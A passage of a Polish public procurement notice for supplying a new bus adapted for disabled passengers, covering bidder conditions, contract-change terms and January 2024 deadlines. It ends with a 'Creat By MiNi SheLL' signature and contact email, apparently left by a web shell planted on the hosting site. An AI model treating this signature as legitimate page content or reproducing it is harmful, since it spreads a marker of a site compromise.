udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia wymagań w zakresie ww. warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w zakresie ww. warunku<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia wymagań w zakresie ww. warunku<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli:<br/>a) wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie co najmniej: jedną dostawę fabrycznie nowego autobusu przystosowanego do<br/>przewozu osób niepełnosprawnych w tym na wózkach inwalidzkich – załącznik do oferty (niewymagany na etapie składania<br/>ofert);<br/>UWAGA: Do wykazu muszą zostać dołączone dowody potwierdzające, iż wskazane dostawy zostały wykonane należycie<br/>(np. referencje, protokół odbioru)<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (Załącznik do oferty), z<br/>którego wynika, które dostawy wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust.<br/>2.<br/>5. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub<br/>zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację<br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. O<br/>udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX<br/>SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące: <br/>1) zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia wymagań w zakresie ww. warunku<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia wymagań w zakresie ww. warunku<br/>3) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia wymagań w zakresie ww. warunku<br/>4) zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli:<br/>a) wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy -<br/>w tym okresie, wykonał należycie co najmniej: jedną dostawę fabrycznie nowego autobusu przystosowanego do przewozu osób<br/>niepełnosprawnych w tym na wózkach inwalidzkich – załącznik do oferty (niewymagany na etapie składania ofert);<br/>UWAGA: Do wykazu muszą zostać dołączone dowody potwierdzające, iż wskazane dostawy zostały wykonane należycie (np.<br/>referencje, protokół odbioru)<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w<br/>inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie (Załącznik do oferty), z którego<br/>wynika, które dostawy wykonają poszczególni wykonawcy w odniesieniu do warunków, które zostały opisane w ust. 2.<br/>5. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie<br/>przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w<br/>inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia<br/>publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w pkt.<br/>10.1 SWZ, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które<br/>roboty budowlane/dostawy/usługi (w zależności od tego co jest przedmiotem postępowania) wykonają poszczególni<br/>wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający i Wykonawca mają prawo za obopólną zgodą do wprowadzania zmian<br/>w przypadku zaistnienia co najmniej jednej z następujących okoliczności:<br/>1) pojawienia się na rynku po zawarciu Umowy nowych rozwiązań technicznych lub technologicznych pozwalających na<br/>zmniejszenie kosztów eksploatacji pojazdu lub uzyskanie korzystniejszych parametrów technicznych,<br/>2) zmiana może przyczynić się do usprawnienia jego właściwości użytkowych, podniesienia efektywności działania pojazdu,<br/>3) zaniechania lub wycofania z produkcji określonych materiałów lub elementów wskazanych w opisie przedmiotu<br/>zamówienia,<br/>4) zmiany obowiązujących przepisów prawnych lub norm.<br/>5) w przypadku zaistnienia innej istotnej okoliczności powodującej, że wykonanie Umowy bez dokonania jej zmian nie leży w<br/>interesie publicznym, czego nie można było przewidzieć w na etapie zawierania Umowy,<br/>6) zmiany parametrów przy zachowaniu parametrów równoważności,<br/>2. Zmiany, o których mowa wyżej, nie mogą powodować wzrostu wynagrodzenia umownego Wykonawcy, ani zmienić<br/>parametrów istotnych jego oferty.<br/>3. W przypadku, o którym mowa w ust. 1 pkt 4, umowa podlegać będzie zmianie w takim zakresie, w jakim zmiany są<br/>niezbędne do dostosowania Umowy do zmienionych przepisów.<br/>4. Zamawiający dopuszcza zmianę terminu realizacji zamówienia w przypadku, gdy opóźnienie w wykonaniu przedmiotu<br/>umowy spowodowane będzie okolicznością, która wystąpiła z przyczyn niezależnych od Wykonawcy po zawarciu umowy,<br/>które Zamawiający uzna za uzasadniające zmianę terminu,<br/>5. Wniosek danej strony o dokonanie zmian w Umowie powinien być składany na piśmie i zawierać dokładny opis<br/>proponowanej zmiany. Do wniosku należy załączyć dokumenty uzasadniające wprowadzenie zmiany. Po otrzymaniu<br/>wniosku o dokonanie zmiany lub po złożeniu propozycji zmiany, druga strona pisemnie poinformuje stronę składającą<br/>wniosek o możliwości wprowadzenia zmian.<br/>6. Zmiany Umowy mogą zostać dokonane w formie pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-18 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-18 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com